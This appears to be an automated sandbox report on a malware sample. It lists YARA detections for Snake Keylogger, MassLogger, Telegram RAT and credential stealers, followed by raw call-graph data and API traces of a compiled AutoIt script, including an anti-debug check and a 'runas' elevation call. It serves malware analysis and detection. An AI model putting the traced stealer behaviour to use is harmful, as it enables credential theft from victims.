• Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000001.00000002.4193632082.0000000002D70000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000001.00000002.4195898548.0000000005680000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.4195898548.0000000005680000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.4195898548.0000000005680000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000001.00000002.4195898548.0000000005680000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000001.00000002.4195898548.0000000005680000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                            • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000001.00000002.4195898548.0000000005680000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                            • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000001.00000002.4194140589.00000000031F6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.4194140589.00000000031F6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.4194140589.00000000031F6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:high
                                                                            Has exited:false


Execution Graph

Execution Coverage:3.7%
Dynamic/Decrypted Code Coverage:1.3%
Signature Coverage:2.9%
Total number of Nodes:2000
Total number of Limit Nodes:53
104672->104675 104678 9846b3 104674->104678 104680 988047 59 API calls 104674->104680 104693 9bd588 104675->104693 104677->104674 104683 988047 59 API calls 104678->104683 104685 9846ba 104678->104685 104679 98784b 59 API calls 104679->104682 104680->104678 104681 9bd5b4 104681->104672 104687 9bd59f 104681->104687 104682->104667 104683->104685 104684->104672 104684->104681 104691 9bd532 104684->104691 104686 988047 59 API calls 104685->104686 104695 9846c1 Mailbox 104685->104695 104686->104695 104689 987bcc 59 API calls 104687->104689 104688 9bd590 104690 987bcc 59 API calls 104688->104690 104689->104693 104690->104693 104691->104688 104696 9bd57b 104691->104696 104692 9879f2 59 API calls 104692->104693 104693->104682 104693->104692 104718 987924 59 API calls 2 library calls 104693->104718 104695->104226 104697 987bcc 59 API calls 104696->104697 104697->104693 104699 9bec6b 104698->104699 104700 987b40 104698->104700 104725 9d7bdb 59 API calls _memmove 104699->104725 104719 987a51 104700->104719 104703 987b4c 104703->104233 104707 9e3c37 104703->104707 104704 9bec75 104705 988047 59 API calls 104704->104705 104706 9bec7d Mailbox 104705->104706 104726 9e445a GetFileAttributesW 104707->104726 104710->104251 104711->104250 104712->104213 104713->104247 104714->104247 104716 987e4f 59 API calls 104715->104716 104717 984669 104716->104717 104717->104679 104717->104682 104718->104693 104720 987a5f 104719->104720 104724 987a85 _memmove 104719->104724 104721 9a0db6 Mailbox 59 API calls 104720->104721 104720->104724 104722 987ad4 104721->104722 104723 9a0db6 Mailbox 59 API calls 104722->104723 104723->104724 104724->104703 104725->104704 104727 9e3c3e 104726->104727 104728 9e4475 FindFirstFileW 104726->104728 104727->104233 104727->104242 104728->104727 104729 9e448a FindClose 104728->104729 104729->104727 104755 987a16 104730->104755 104732 98646a 104762 98750f 59 API calls 2 library calls 104732->104762 104735 986484 Mailbox 104735->104256 104737 9bdff6 104765 9df8aa 91 
API calls 4 library calls 104737->104765 104738 98750f 59 API calls 104749 986265 104738->104749 104742 987d8c 59 API calls 104742->104749 104743 9be004 104766 98750f 59 API calls 2 library calls 104743->104766 104745 9be01a 104745->104735 104746 986799 _memmove 104767 9df8aa 91 API calls 4 library calls 104746->104767 104747 9bdf92 104748 988029 59 API calls 104747->104748 104750 9bdf9d 104748->104750 104749->104732 104749->104737 104749->104738 104749->104742 104749->104746 104749->104747 104752 987e4f 59 API calls 104749->104752 104760 985f6c 60 API calls 104749->104760 104761 985d41 59 API calls Mailbox 104749->104761 104763 985e72 60 API calls 104749->104763 104764 987924 59 API calls 2 library calls 104749->104764 104754 9a0db6 Mailbox 59 API calls 104750->104754 104753 98643b CharUpperBuffW 104752->104753 104753->104749 104754->104746 104756 9a0db6 Mailbox 59 API calls 104755->104756 104757 987a3b 104756->104757 104758 988029 59 API calls 104757->104758 104759 987a4a 104758->104759 104759->104749 104760->104749 104761->104749 104762->104735 104763->104749 104764->104749 104765->104743 104766->104745 104767->104735 104768->104263 104769->104307 104770->104265 104771->104270 104772->104305 104773->104305 104774->104318 104775->104318 104776->104324 104777->104379 104778->104351 104779->104366 104781 98f4ba 104780->104781 104782 98f650 104780->104782 104783 9c441e 104781->104783 104784 98f4c6 104781->104784 104785 987de1 59 API calls 104782->104785 104786 9fbc6b 341 API calls 104783->104786 104888 98f290 341 API calls 2 library calls 104784->104888 104791 98f58c Mailbox 104785->104791 104788 9c442c 104786->104788 104792 98f630 104788->104792 104890 9e9e4a 89 API calls 4 library calls 104788->104890 104790 98f4fd 104790->104788 104790->104791 104790->104792 104794 98f5e3 104791->104794 104797 9e3c37 3 API calls 104791->104797 104805 9ecb7a 104791->104805 104885 9fdf37 104791->104885 104792->104379 104794->104792 104889 989c90 59 API calls Mailbox 104794->104889 
104797->104794 104798->104362 104799->104368 104800->104379 104801->104377 104802->104380 104803->104384 104804->104379 104806 987667 59 API calls 104805->104806 104807 9ecbaf 104806->104807 104808 987667 59 API calls 104807->104808 104809 9ecbb8 104808->104809 104810 9ecbcc 104809->104810 105024 989b3c 59 API calls 104809->105024 104812 989837 84 API calls 104810->104812 104813 9ecbe9 104812->104813 104814 9eccea 104813->104814 104815 9ecc0b 104813->104815 104884 9ecd1a Mailbox 104813->104884 104891 984ddd 104814->104891 104816 989837 84 API calls 104815->104816 104819 9ecc17 104816->104819 104821 988047 59 API calls 104819->104821 104820 9ecd16 104824 987667 59 API calls 104820->104824 104820->104884 104822 9ecc23 104821->104822 104827 9ecc69 104822->104827 104828 9ecc37 104822->104828 104823 984ddd 136 API calls 104823->104820 104825 9ecd4b 104824->104825 104826 987667 59 API calls 104825->104826 104829 9ecd54 104826->104829 104831 989837 84 API calls 104827->104831 104830 988047 59 API calls 104828->104830 104832 987667 59 API calls 104829->104832 104833 9ecc47 104830->104833 104834 9ecc76 104831->104834 104835 9ecd5d 104832->104835 104837 987cab 59 API calls 104833->104837 104838 988047 59 API calls 104834->104838 104836 987667 59 API calls 104835->104836 104839 9ecd66 104836->104839 104840 9ecc51 104837->104840 104841 9ecc82 104838->104841 104843 989837 84 API calls 104839->104843 104844 989837 84 API calls 104840->104844 105025 9e4a31 GetFileAttributesW 104841->105025 104846 9ecd73 104843->104846 104847 9ecc5d 104844->104847 104845 9ecc8b 104848 9ecc9e 104845->104848 104851 9879f2 59 API calls 104845->104851 104849 98459b 59 API calls 104846->104849 104850 987b2e 59 API calls 104847->104850 104853 989837 84 API calls 104848->104853 104859 9ecca4 104848->104859 104852 9ecd8e 104849->104852 104850->104827 104851->104848 104854 9879f2 59 API calls 104852->104854 104855 9ecccb 104853->104855 104856 9ecd9d 104854->104856 105026 9e37ef 75 API calls Mailbox 
104855->105026 104858 9ecdd1 104856->104858 104861 9879f2 59 API calls 104856->104861 104860 988047 59 API calls 104858->104860 104859->104884 104862 9ecddf 104860->104862 104863 9ecdae 104861->104863 104864 987b2e 59 API calls 104862->104864 104863->104858 104866 987bcc 59 API calls 104863->104866 104865 9ecded 104864->104865 104867 987b2e 59 API calls 104865->104867 104868 9ecdc3 104866->104868 104869 9ecdfb 104867->104869 104870 987bcc 59 API calls 104868->104870 104871 987b2e 59 API calls 104869->104871 104870->104858 104872 9ece09 104871->104872 104873 989837 84 API calls 104872->104873 104874 9ece15 104873->104874 104915 9e4071 104874->104915 104876 9ece26 104877 9e3c37 3 API calls 104876->104877 104878 9ece30 104877->104878 104879 989837 84 API calls 104878->104879 104882 9ece61 104878->104882 104880 9ece4e 104879->104880 104969 9e9155 104880->104969 105027 984e4a 104882->105027 104884->104794 104886 9fcadd 130 API calls 104885->104886 104887 9fdf47 104886->104887 104887->104794 104888->104790 104889->104794 104890->104792 105033 984bb5 104891->105033 104896 984e08 LoadLibraryExW 105043 984b6a 104896->105043 104897 9bd8e6 104898 984e4a 84 API calls 104897->104898 104900 9bd8ed 104898->104900 104902 984b6a 3 API calls 104900->104902 104904 9bd8f5 104902->104904 105069 984f0b 104904->105069 104905 984e2f 104905->104904 104906 984e3b 104905->104906 104908 984e4a 84 API calls 104906->104908 104910 984e40 104908->104910 104910->104820 104910->104823 104912 9bd91c 105077 984ec7 104912->105077 104916 9e408d 104915->104916 104917 9e4092 104916->104917 104918 9e40a0 104916->104918 104919 988047 59 API calls 104917->104919 104920 987667 59 API calls 104918->104920 104921 9e409b Mailbox 104919->104921 104922 9e40a8 104920->104922 104921->104876 104923 987667 59 API calls 104922->104923 104924 9e40b0 104923->104924 104925 987667 59 API calls 104924->104925 104926 9e40bb 104925->104926 104927 987667 59 API calls 104926->104927 104928 9e40c3 104927->104928 104929 987667 
59 API calls 104928->104929 104930 9e40cb 104929->104930 104931 987667 59 API calls 104930->104931 104932 9e40d3 104931->104932 104933 987667 59 API calls 104932->104933 104934 9e40db 104933->104934 104935 987667 59 API calls 104934->104935 104936 9e40e3 104935->104936 104937 98459b 59 API calls 104936->104937 104938 9e40fa 104937->104938 104939 98459b 59 API calls 104938->104939 104940 9e4113 104939->104940 104941 9879f2 59 API calls 104940->104941 104942 9e411f 104941->104942 104943 9e4132 104942->104943 104944 987d2c 59 API calls 104942->104944 104945 9879f2 59 API calls 104943->104945 104944->104943 104946 9e413b 104945->104946 104947 9e414b 104946->104947 104948 987d2c 59 API calls 104946->104948 104949 988047 59 API calls 104947->104949 104948->104947 104950 9e4157 104949->104950 104951 987b2e 59 API calls 104950->104951 104952 9e4163 104951->104952 105504 9e4223 59 API calls 104952->105504 104954 9e4172 105505 9e4223 59 API calls 104954->105505 104956 9e4185 104957 9879f2 59 API calls 104956->104957 104958 9e418f 104957->104958 104959 9e41a6 104958->104959 104960 9e4194 104958->104960 104962 9879f2 59 API calls 104959->104962 104961 987cab 59 API calls 104960->104961 104963 9e41a1 104961->104963 104964 9e41af 104962->104964 104967 987b2e 59 API calls 104963->104967 104965 9e41cd 104964->104965 104966 987cab 59 API calls 104964->104966 104968 987b2e 59 API calls 104965->104968 104966->104963 104967->104965 104968->104921 104970 9e9162 __write_nolock 104969->104970 104971 9a0db6 Mailbox 59 API calls 104970->104971 104972 9e91bf 104971->104972 104973 98522e 59 API calls 104972->104973 104974 9e91c9 104973->104974 104975 9e8f5f GetSystemTimeAsFileTime 104974->104975 104976 9e91d4 104975->104976 104977 984ee5 85 API calls 104976->104977 104978 9e91e7 _wcscmp 104977->104978 104979 9e920b 104978->104979 104980 9e92b8 104978->104980 105536 9e9734 104979->105536 104982 9e9734 96 API calls 104980->104982 104997 9e9284 _wcscat 104982->104997 104985 984f0b 74 API calls 
104987 9e92dd 104985->104987 104986 9e92c1 104986->104882 104988 984f0b 74 API calls 104987->104988 104990 9e92ed 104988->104990 104989 9e9239 _wcscat _wcscpy 105543 9a40fb 58 API calls __wsplitpath_helper 104989->105543 104991 984f0b 74 API calls 104990->104991 104993 9e9308 104991->104993 104994 984f0b 74 API calls 104993->104994 104995 9e9318 104994->104995 104996 984f0b 74 API calls 104995->104996 104998 9e9333 104996->104998 104997->104985 104997->104986 104999 984f0b 74 API calls 104998->104999 105000 9e9343 104999->105000 105001 984f0b 74 API calls 105000->105001 105002 9e9353 105001->105002 105003 984f0b 74 API calls 105002->105003 105004 9e9363 105003->105004 105506 9e98e3 GetTempPathW GetTempFileNameW 105004->105506 105006 9e936f 105007 9a525b 115 API calls 105006->105007 105017 9e9380 105007->105017 105008 9e943a 105520 9a53a6 105008->105520 105011 984f0b 74 API calls 105011->105017 105017->104986 105017->105008 105017->105011 105507 9a4863 105017->105507 105024->104810 105025->104845 105026->104859 105028 984e54 105027->105028 105030 984e5b 105027->105030 105029 9a53a6 __fcloseall 83 API calls 105028->105029 105029->105030 105031 984e6a 105030->105031 105032 984e7b FreeLibrary 105030->105032 105031->104884 105032->105031 105082 984c03 105033->105082 105036 984bdc 105037 984bec FreeLibrary 105036->105037 105038 984bf5 105036->105038 105037->105038 105040 9a525b 105038->105040 105039 984c03 2 API calls 105039->105036 105086 9a5270 105040->105086 105042 984dfc 105042->104896 105042->104897 105244 984c36 105043->105244 105046 984b8f 105048 984baa 105046->105048 105049 984ba1 FreeLibrary 105046->105049 105047 984c36 2 API calls 105047->105046 105050 984c70 105048->105050 105049->105048 105051 9a0db6 Mailbox 59 API calls 105050->105051 105052 984c85 105051->105052 105053 98522e 59 API calls 105052->105053 105054 984c91 _memmove 105053->105054 105055 984ccc 105054->105055 105057 984d89 105054->105057 105058 984dc1 105054->105058 105056 984ec7 69 API calls 
105055->105056 105066 984cd5 105056->105066 105248 984e89 CreateStreamOnHGlobal 105057->105248 105259 9e991b 95 API calls 105058->105259 105061 984f0b 74 API calls 105061->105066 105063 984d69 105063->104905 105064 9bd8a7 105065 984ee5 85 API calls 105064->105065 105067 9bd8bb 105065->105067 105066->105061 105066->105063 105066->105064 105254 984ee5 105066->105254 105068 984f0b 74 API calls 105067->105068 105068->105063 105070 984f1d 105069->105070 105071 9bd9cd 105069->105071 105283 9a55e2 105070->105283 105074 9e9109 105481 9e8f5f 105074->105481 105076 9e911f 105076->104912 105078 9bd990 105077->105078 105079 984ed6 105077->105079 105486 9a5c60 105079->105486 105081 984ede 105083 984bd0 105082->105083 105084 984c0c LoadLibraryA 105082->105084 105083->105036 105083->105039 105084->105083 105085 984c1d GetProcAddress 105084->105085 105085->105083 105088 9a527c _fprintf 105086->105088 105087 9a528f 105135 9a8b28 58 API calls __getptd_noexit 105087->105135 105088->105087 105090 9a52c0 105088->105090 105105 9b04e8 105090->105105 105091 9a5294 105136 9a8db6 9 API calls _fprintf 105091->105136 105094 9a52c5 105095 9a52db 105094->105095 105096 9a52ce 105094->105096 105098 9a5305 105095->105098 105099 9a52e5 105095->105099 105137 9a8b28 58 API calls __getptd_noexit 105096->105137 105120 9b0607 105098->105120 105138 9a8b28 58 API calls __getptd_noexit 105099->105138 105100 9a529f @_EH4_CallFilterFunc@8 _fprintf 105100->105042 105106 9b04f4 _fprintf 105105->105106 105107 9a9c0b __lock 58 API calls 105106->105107 105117 9b0502 105107->105117 105108 9b0576 105140 9b05fe 105108->105140 105109 9b057d 105145 9a881d 58 API calls 2 library calls 105109->105145 105112 9b05f3 _fprintf 105112->105094 105113 9b0584 105113->105108 105146 9a9e2b InitializeCriticalSectionAndSpinCount 105113->105146 105116 9a9c93 __mtinitlocknum 58 API calls 105116->105117 105117->105108 105117->105109 105117->105116 105143 9a6c50 59 API calls __lock 105117->105143 105144 9a6cba LeaveCriticalSection 
LeaveCriticalSection _doexit 105117->105144 105118 9b05aa EnterCriticalSection 105118->105108 105129 9b0627 __wopenfile 105120->105129 105121 9b0641 105151 9a8b28 58 API calls __getptd_noexit 105121->105151 105123 9b07fc 105123->105121 105127 9b085f 105123->105127 105124 9b0646 105152 9a8db6 9 API calls _fprintf 105124->105152 105126 9a5310 105139 9a5332 LeaveCriticalSection LeaveCriticalSection _fprintf 105126->105139 105148 9b85a1 105127->105148 105129->105121 105129->105123 105129->105129 105153 9a37cb 60 API calls 2 library calls 105129->105153 105131 9b07f5 105131->105123 105154 9a37cb 60 API calls 2 library calls 105131->105154 105133 9b0814 105133->105123 105155 9a37cb 60 API calls 2 library calls 105133->105155 105135->105091 105136->105100 105137->105100 105138->105100 105139->105100 105147 9a9d75 LeaveCriticalSection 105140->105147 105142 9b0605 105142->105112 105143->105117 105144->105117 105145->105113 105146->105118 105147->105142 105156 9b7d85 105148->105156 105150 9b85ba 105150->105126 105151->105124 105152->105126 105153->105131 105154->105133 105155->105123 105157 9b7d91 _fprintf 105156->105157 105158 9b7da7 105157->105158 105160 9b7ddd 105157->105160 105241 9a8b28 58 API calls __getptd_noexit 105158->105241 105167 9b7e4e 105160->105167 105161 9b7dac 105242 9a8db6 9 API calls _fprintf 105161->105242 105164 9b7df9 105243 9b7e22 LeaveCriticalSection __unlock_fhandle 105164->105243 105166 9b7db6 _fprintf 105166->105150 105168 9b7e6e 105167->105168 105169 9a44ea __wsopen_nolock 58 API calls 105168->105169 105173 9b7e8a 105169->105173 105170 9b7fc1 105171 9a8dc6 __invoke_watson 8 API calls 105170->105171 105172 9b85a0 105171->105172 105174 9b7d85 __wsopen_helper 103 API calls 105172->105174 105173->105170 105175 9b7ec4 105173->105175 105181 9b7ee7 105173->105181 105176 9b85ba 105174->105176 105177 9a8af4 __wsopen_nolock 58 API calls 105175->105177 105176->105164 105178 9b7ec9 105177->105178 105179 9a8b28 _fprintf 58 API calls 105178->105179 105180 
9b7ed6 105179->105180 105182 9a8db6 _fprintf 9 API calls 105180->105182 105183 9b7fa5 105181->105183 105190 9b7f83 105181->105190 105184 9b7ee0 105182->105184 105185 9a8af4 __wsopen_nolock 58 API calls 105183->105185 105184->105164 105186 9b7faa 105185->105186 105187 9a8b28 _fprintf 58 API calls 105186->105187 105188 9b7fb7 105187->105188 105189 9a8db6 _fprintf 9 API calls 105188->105189 105189->105170 105191 9ad294 __alloc_osfhnd 61 API calls 105190->105191 105192 9b8051 105191->105192 105193 9b805b 105192->105193 105194 9b807e 105192->105194 105196 9a8af4 __wsopen_nolock 58 API calls 105193->105196 105195 9b7cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 105194->105195 105206 9b80a0 105195->105206 105197 9b8060 105196->105197 105199 9a8b28 _fprintf 58 API calls 105197->105199 105198 9b811e GetFileType 105200 9b816b 105198->105200 105201 9b8129 GetLastError 105198->105201 105203 9b806a 105199->105203 105213 9ad52a __set_osfhnd 59 API calls 105200->105213 105205 9a8b07 __dosmaperr 58 API calls 105201->105205 105202 9b80ec GetLastError 105207 9a8b07 __dosmaperr 58 API calls 105202->105207 105204 9a8b28 _fprintf 58 API calls 105203->105204 105204->105184 105208 9b8150 CloseHandle 105205->105208 105206->105198 105206->105202 105209 9b7cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 105206->105209 105210 9b8111 105207->105210 105208->105210 105211 9b815e 105208->105211 105212 9b80e1 105209->105212 105215 9a8b28 _fprintf 58 API calls 105210->105215 105214 9a8b28 _fprintf 58 API calls 105211->105214 105212->105198 105212->105202 105218 9b8189 105213->105218 105216 9b8163 105214->105216 105215->105170 105216->105210 105217 9b8344 105217->105170 105220 9b8517 CloseHandle 105217->105220 105218->105217 105219 9b18c1 __lseeki64_nolock 60 API calls 105218->105219 105237 9b820a 105218->105237 105221 9b81f3 105219->105221 105222 9b7cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 105220->105222 105224 9a8af4 __wsopen_nolock 58 API calls 
105221->105224 105221->105237 105223 9b853e 105222->105223 105226 9b8572 105223->105226 105227 9b8546 GetLastError 105223->105227 105224->105237 105225 9b0e5b 70 API calls __read_nolock 105225->105237 105226->105170 105228 9a8b07 __dosmaperr 58 API calls 105227->105228 105229 9b8552 105228->105229 105233 9ad43d __free_osfhnd 59 API calls 105229->105233 105230 9b0add __close_nolock 61 API calls 105230->105237 105231 9b823c 105232 9b97a2 __chsize_nolock 82 API calls 105231->105232 105231->105237 105232->105231 105233->105226 105234 9ad886 __write 78 API calls 105234->105237 105235 9b83c1 105236 9b0add __close_nolock 61 API calls 105235->105236 105238 9b83c8 105236->105238 105237->105217 105237->105225 105237->105230 105237->105231 105237->105234 105237->105235 105239 9b18c1 60 API calls __lseeki64_nolock 105237->105239 105240 9a8b28 _fprintf 58 API calls 105238->105240 105239->105237 105240->105170 105241->105161 105242->105166 105243->105166 105245 984b83 105244->105245 105246 984c3f LoadLibraryA 105244->105246 105245->105046 105245->105047 105246->105245 105247 984c50 GetProcAddress 105246->105247 105247->105245 105249 984ea3 FindResourceExW 105248->105249 105253 984ec0 105248->105253 105250 9bd933 LoadResource 105249->105250 105249->105253 105251 9bd948 SizeofResource 105250->105251 105250->105253 105252 9bd95c LockResource 105251->105252 105251->105253 105252->105253 105253->105055 105255 9bd9ab 105254->105255 105256 984ef4 105254->105256 105260 9a584d 105256->105260 105258 984f02 105258->105066 105259->105055 105261 9a5859 _fprintf 105260->105261 105262 9a586b 105261->105262 105263 9a5891 105261->105263 105273 9a8b28 58 API calls __getptd_noexit 105262->105273 105275 9a6c11 105263->105275 105266 9a5870 105274 9a8db6 9 API calls _fprintf 105266->105274 105270 9a58a6 105282 9a58c8 LeaveCriticalSection LeaveCriticalSection _fprintf 105270->105282 105272 9a587b _fprintf 105272->105258 105273->105266 105274->105272 105276 9a6c43 EnterCriticalSection 105275->105276 
105277 9a6c21 105275->105277 105278 9a5897 105276->105278 105277->105276 105279 9a6c29 105277->105279 105281 9a57be 83 API calls 4 library calls 105278->105281 105280 9a9c0b __lock 58 API calls 105279->105280 105280->105278 105281->105270 105282->105272 105286 9a55fd 105283->105286 105285 984f2e 105285->105074 105287 9a5609 _fprintf 105286->105287 105288 9a564c 105287->105288 105289 9a5644 _fprintf 105287->105289 105292 9a561f _memset 105287->105292 105290 9a6c11 __lock_file 59 API calls 105288->105290 105289->105285 105291 9a5652 105290->105291 105299 9a541d 105291->105299 105313 9a8b28 58 API calls __getptd_noexit 105292->105313 105294 9a5639 105314 9a8db6 9 API calls _fprintf 105294->105314 105301 9a5438 _memset 105299->105301 105306 9a5453 105299->105306 105300 9a5443 105411 9a8b28 58 API calls __getptd_noexit 105300->105411 105301->105300 105301->105306 105310 9a5493 105301->105310 105303 9a5448 105412 9a8db6 9 API calls _fprintf 105303->105412 105315 9a5686 LeaveCriticalSection LeaveCriticalSection _fprintf 105306->105315 105307 9a55a4 _memset 105414 9a8b28 58 API calls __getptd_noexit 105307->105414 105310->105306 105310->105307 105316 9a46e6 105310->105316 105323 9b0e5b 105310->105323 105391 9b0ba7 105310->105391 105413 9b0cc8 58 API calls 3 library calls 105310->105413 105313->105294 105314->105289 105315->105289 105317 9a46f0 105316->105317 105318 9a4705 105316->105318 105415 9a8b28 58 API calls __getptd_noexit 105317->105415 105318->105310 105320 9a46f5 105416 9a8db6 9 API calls _fprintf 105320->105416 105322 9a4700 105322->105310 105324 9b0e7c 105323->105324 105325 9b0e93 105323->105325 105426 9a8af4 58 API calls __getptd_noexit 105324->105426 105327 9b15cb 105325->105327 105331 9b0ecd 105325->105331 105442 9a8af4 58 API calls __getptd_noexit 105327->105442 105328 9b0e81 105427 9a8b28 58 API calls __getptd_noexit 105328->105427 105333 9b0ed5 105331->105333 105340 9b0eec 105331->105340 105332 9b15d0 105443 9a8b28 58 API calls __getptd_noexit 
105332->105443 105428 9a8af4 58 API calls __getptd_noexit 105333->105428 105335 9b0e88 105335->105310 105337 9b0ee1 105444 9a8db6 9 API calls _fprintf 105337->105444 105338 9b0eda 105429 9a8b28 58 API calls __getptd_noexit 105338->105429 105340->105335 105341 9b0f01 105340->105341 105343 9b0f1b 105340->105343 105345 9b0f39 105340->105345 105430 9a8af4 58 API calls __getptd_noexit 105341->105430 105343->105341 105359 9b0f26 105343->105359 105431 9a881d 58 API calls 2 library calls 105345->105431 105348 9b0f49 105349 9b0f6c 105348->105349 105350 9b0f51 105348->105350 105434 9b18c1 60 API calls 3 library calls 105349->105434 105432 9a8b28 58 API calls __getptd_noexit 105350->105432 105351 9b103a 105353 9b10b3 ReadFile 105351->105353 105358 9b1050 GetConsoleMode 105351->105358 105356 9b1593 GetLastError 105353->105356 105357 9b10d5 105353->105357 105355 9b0f56 105433 9a8af4 58 API calls __getptd_noexit 105355->105433 105361 9b15a0 105356->105361 105362 9b1093 105356->105362 105357->105356 105366 9b10a5 105357->105366 105363 9b10b0 105358->105363 105364 9b1064 105358->105364 105417 9b5c6b 105359->105417 105440 9a8b28 58 API calls __getptd_noexit 105361->105440 105373 9b1099 105362->105373 105435 9a8b07 58 API calls 3 library calls 105362->105435 105363->105353 105364->105363 105367 9b106a ReadConsoleW 105364->105367 105366->105373 105374 9b110a 105366->105374 105383 9b1377 105366->105383 105367->105366 105369 9b108d GetLastError 105367->105369 105368 9b15a5 105441 9a8af4 58 API calls __getptd_noexit 105368->105441 105369->105362 105372 9a2d55 _free 58 API calls 105372->105335 105373->105335 105373->105372 105375 9b1176 ReadFile 105374->105375 105381 9b11f7 105374->105381 105377 9b1197 GetLastError 105375->105377 105390 9b11a1 105375->105390 105377->105390 105378 9b12b4 105385 9b1264 MultiByteToWideChar 105378->105385 105438 9b18c1 60 API calls 3 library calls 105378->105438 105379 9b12a4 105437 9a8b28 58 API calls __getptd_noexit 105379->105437 105380 9b147d ReadFile 
105384 9b14a0 GetLastError 105380->105384 105388 9b14ae 105380->105388 105381->105373 105381->105378 105381->105379 105381->105385 105383->105373 105383->105380 105384->105388 105385->105369 105385->105373 105388->105383 105439 9b18c1 60 API calls 3 library calls 105388->105439 105390->105374 105436 9b18c1 60 API calls 3 library calls 105390->105436 105392 9b0bb2 105391->105392 105396 9b0bc7 105391->105396 105478 9a8b28 58 API calls __getptd_noexit 105392->105478 105394 9b0bb7 105479 9a8db6 9 API calls _fprintf 105394->105479 105397 9b0bfc 105396->105397 105403 9b0bc2 105396->105403 105480 9b5fe4 58 API calls __malloc_crt 105396->105480 105399 9a46e6 _fprintf 58 API calls 105397->105399 105400 9b0c10 105399->105400 105445 9b0d47 105400->105445 105402 9b0c17 105402->105403 105404 9a46e6 _fprintf 58 API calls 105402->105404 105403->105310 105405 9b0c3a 105404->105405 105405->105403 105406 9a46e6 _fprintf 58 API calls 105405->105406 105407 9b0c46 105406->105407 105407->105403 105408 9a46e6 _fprintf 58 API calls 105407->105408 105409 9b0c53 105408->105409 105410 9a46e6 _fprintf 58 API calls 105409->105410 105410->105403 105411->105303 105412->105306 105413->105310 105414->105303 105415->105320 105416->105322 105418 9b5c83 105417->105418 105419 9b5c76 105417->105419 105422 9b5c8f 105418->105422 105423 9a8b28 _fprintf 58 API calls 105418->105423 105420 9a8b28 _fprintf 58 API calls 105419->105420 105421 9b5c7b 105420->105421 105421->105351 105422->105351 105424 9b5cb0 105423->105424 105425 9a8db6 _fprintf 9 API calls 105424->105425 105425->105421 105426->105328 105427->105335 105428->105338 105429->105337 105430->105338 105431->105348 105432->105355 105433->105335 105434->105359 105435->105373 105436->105390 105437->105373 105438->105385 105439->105388 105440->105368 105441->105373 105442->105332 105443->105337 105444->105335 105446 9b0d53 _fprintf 105445->105446 105447 9b0d60 105446->105447 105448 9b0d77 105446->105448 105449 9a8af4 __wsopen_nolock 58 API calls 

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00983B68
                                                                              • IsDebuggerPresent.KERNEL32 ref: 00983B7A
                                                                              • GetFullPathNameW.KERNEL32(00007FFF,?,?,00A452F8,00A452E0,?,?), ref: 00983BEB
                                                                                • Part of subcall function 00987BCC: _memmove.LIBCMT ref: 00987C06
                                                                                • Part of subcall function 0099092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00983C14,00A452F8,?,?,?), ref: 0099096E
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00983C6F
                                                                              • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00A37770,00000010), ref: 009BD281
                                                                              • SetCurrentDirectoryW.KERNEL32(?,00A452F8,?,?,?), ref: 009BD2B9
                                                                              • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00A34260,00A452F8,?,?,?), ref: 009BD33F
                                                                              • ShellExecuteW.SHELL32(00000000,?,?), ref: 009BD346
                                                                                • Part of subcall function 00983A46: GetSysColorBrush.USER32(0000000F), ref: 00983A50
                                                                                • Part of subcall function 00983A46: LoadCursorW.USER32(00000000,00007F00), ref: 00983A5F
                                                                                • Part of subcall function 00983A46: LoadIconW.USER32(00000063), ref: 00983A76
                                                                                • Part of subcall function 00983A46: LoadIconW.USER32(000000A4), ref: 00983A88
                                                                                • Part of subcall function 00983A46: LoadIconW.USER32(000000A2), ref: 00983A9A
                                                                                • Part of subcall function 00983A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00983AC0
                                                                                • Part of subcall function 00983A46: RegisterClassExW.USER32(?), ref: 00983B16
                                                                                • Part of subcall function 009839D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00983A03
                                                                                • Part of subcall function 009839D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00983A24
                                                                                • Part of subcall function 009839D5: ShowWindow.USER32(00000000,?,?), ref: 00983A38
                                                                                • Part of subcall function 009839D5: ShowWindow.USER32(00000000,?,?), ref: 00983A41
                                                                                • Part of subcall function 0098434A: _memset.LIBCMT ref: 00984370
                                                                                • Part of subcall function 0098434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00984415
                                                                              Strings
                                                                              • This is a third-party compiled AutoIt script., xrefs: 009BD279
                                                                              • runas, xrefs: 009BD33A
                                                                              Memory Dump Source
